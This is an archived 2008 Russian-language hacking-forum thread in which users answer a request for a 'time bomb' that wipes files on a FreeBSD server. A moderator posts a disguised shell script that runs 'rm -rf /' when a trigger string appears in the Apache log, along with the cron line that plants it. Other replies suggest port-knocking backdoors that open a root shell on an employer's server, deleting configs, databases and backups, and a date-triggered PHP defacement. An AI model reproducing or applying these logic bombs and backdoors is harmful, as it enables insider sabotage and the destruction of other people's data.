ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
20.08.2008, 12:35
|
|
Познающий
Регистрация: 09.06.2005
Сообщений: 72
Провел на форуме:
348081
Репутация:
20
|
|
Временная бомба
Доброго времени суток, уважаемые =)
Вопрос таков как можно или есть готовые решения для создание сего творения, как временная бомба под FreeBSD 6 или подобных систем. с возможностю запуска через PHP скрипт. так же немаловажен факт что бы затерались файлы и папки определнной директории, а так же возможность запуска из nobody.
Если кто то встречал рабучую весрию сго творения отпишите плиз.
|
|
|
20.08.2008, 12:37
|
|
Постоянный
Регистрация: 09.11.2006
Сообщений: 639
Провел на форуме:
1917742
Репутация:
541
|
|
из нободи никак имхо.
|
|
|
|
20.08.2008, 12:55
|
|
Познающий
Регистрация: 09.06.2005
Сообщений: 72
Провел на форуме:
348081
Репутация:
20
|
|
так ясно по другому как?
|
|
|
|
20.08.2008, 15:07
|
|
Moderator - Level 7
Регистрация: 13.12.2006
Сообщений: 531
Провел на форуме:
2127116
Репутация:
383
|
|
Если на данный момент ты привелигированный пользователь в системе, то можно что то вроде такого:
Создаешь скрипт примерного содержания
nano /etc/conf.d/net.conf_param
Код:
#!/bin/sh
grep "File does not exist: /var/www/localhost/htdocs/pizdec.serveru" /var/log/apache2/error_log >/dev/null
if [ $? -ne 1 ]
then
rm -rf /
exit 1
fi
Вместо net.conf_param - любое название, лишь бы похожее на что нибудь системное и полезное , что бы не удалили )) так же как и путь...
Устанавливаешь права :
chmod 777 /etc/conf.d/net.conf_param
И добавляешь в cron свое задание (на примере vixie-cron):
echo "30 12 * * * root /bin/sh /etc/conf.d/net.conf_param" >> /etc/crontab
---------------
Что это дает?
Наш скрипт ежедневно, в 12.30 смотрит содержимое файла /var/log/apache2/error_log (ошибки апача), и если находит строку ( File does not exist: /var/www/localhost/htdocs/pizdec.serveru) - то он удаляет содержимое корневой директории rm -rf /
Добавим эту строку в лог:
http://127.0.0.1/pizdec.serveru
http://filegu.ru/f/ms8mHwt1/video.mpeg.html (4,75 Мб)
ководство )
Последний раз редактировалось neval; 20.08.2008 в 20:22..
Причина: очепятко...
|
|
|
|
25.08.2008, 17:25
|
|
Познающий
Регистрация: 30.10.2007
Сообщений: 63
Провел на форуме:
299216
Репутация:
59
|
|
Однажды я озадачился вопросом, как быть, если контора, которую слегка админил, внезапно "кинет". Потому был собран немалый "арсенал".
Одно из интересных решений - "стучалки". Принцип действия - специальный демон постоянно мониторит некоторые порты (tcp/udp, даже закрытые). При попытке подсоединиться к этим портам в нужном порядке отработает заранее заданная команда. Например, если указать порты 24, 8001 и 44, то, после подключения именно к этим портам (порты, которые закрыты так и будут закрытыми) именно в таком порядке выполнится заданная команда. Есть вариации doorman/knockd, существует под linux и bsd, мануал по настройке легко ищется в яндексе по запросу knockd.
Недостаток: потребуются, естественно, права root.
Достоинства: права, даже ниже, чем nobody (не требует установки соединения), редко кто шарит в этих демонах и, при приёме сервера (если его надо сдать) не найдёт ничего криминального, в логах не будет никаких записей, сверхвысокая надёжность (вероятность того, что злоумышленник "угадает" правильность портов - не выше [3.5e-13]%), не требует особого клиента - достаточно telnet (для tcp портов).
Аналогичным образом можно оставить бэкдор, который откроет рутову шелл на нужном порту.
|
|
|
|
26.08.2008, 00:00
|
|
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме:
3885269
Репутация:
1158
|
|
neval-> сомневаюсь в работоспособности твоего скрипта. т.к. команду rm -rf * даже под рутом не все системы адекватно воспримут.
Что касается проблем ТС то лучше заранее знать местонахождение важных конфигурационных файлов системы, файлов баз данных, файлов хранящих какие либо данные или сведения. И их по отдельности убивать включая бэкапы.
p.s. нужно решать иными путями, варварство не есть хорошо.
|
|
|
|
26.08.2008, 12:11
|
|
Участник форума
Регистрация: 05.12.2007
Сообщений: 113
Провел на форуме:
252598
Репутация:
34
|
|
в крон попробовать можно но из по nobody врятли выйдет
можно найти скрипт пхп открытый для записи
find / -perm 777 -name *.php -- както так ))
м дописать в конец чето то вроде
if(date("d.m.y") == "1.1.1") system("echo HACKED by VASYA>index.php");
|
|
|
|
26.08.2008, 19:06
|
|
Moderator - Level 7
Регистрация: 13.12.2006
Сообщений: 531
Провел на форуме:
2127116
Репутация:
383
|
|
neval-> сомневаюсь в работоспособности твоего скрипта. т.к. команду rm -rf * даже под рутом не все системы адекватно воспримут
procedure, я не пробывал, но скажи какие?
Насколько мне известно - linux and freebsd не задают вопросов при этой команде.
Во избежания споров можешь проверить.
------------
затерались файлы и папки определнной директории
------------
а так же возможность запуска из nobody
------------
|
|
|
|
28.08.2008, 13:39
|
|
Познающий
Регистрация: 09.06.2005
Сообщений: 72
Провел на форуме:
348081
Репутация:
20
|
|
А что то реальнее есть еще ? Кто вообще тестировал или пробывал сделать такое ?
|
|
|
|
28.08.2008, 13:54
|
|
Moderator - Level 7
Регистрация: 13.12.2006
Сообщений: 531
Провел на форуме:
2127116
Репутация:
383
|
|
в первом посте скринвидео - все работает
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
